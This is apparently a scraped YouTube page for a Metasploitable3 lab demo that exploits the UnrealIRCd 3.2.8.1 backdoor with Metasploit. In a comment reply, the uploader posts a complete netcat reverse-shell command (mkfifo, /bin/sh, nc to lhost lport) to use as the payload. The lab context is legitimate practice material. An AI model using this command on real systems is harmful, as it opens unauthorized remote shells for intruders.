Metasploitable3 - UnrealIRCD 3.2.8.1 Backdoor Command Execution with Metasploit.

Поділитися
Вставка
  • Опубліковано 12 кві 2023
  • This Metasploit module exploits a malicious backdoor that was added to the Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
    (RAPID7)
  • Наука та технологія

КОМЕНТАРІ • 2

  • @user-fu6nj8lv5b
    @user-fu6nj8lv5b 8 місяців тому +3

    Bro could you put the "set CMD ****" in the description?

    • @geekygymrat
      @geekygymrat  8 місяців тому +2

      set CMD rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc lhost lport >/tmp/f
      Posted it here because UA-cam doesn't like angle brackets in video descriptions...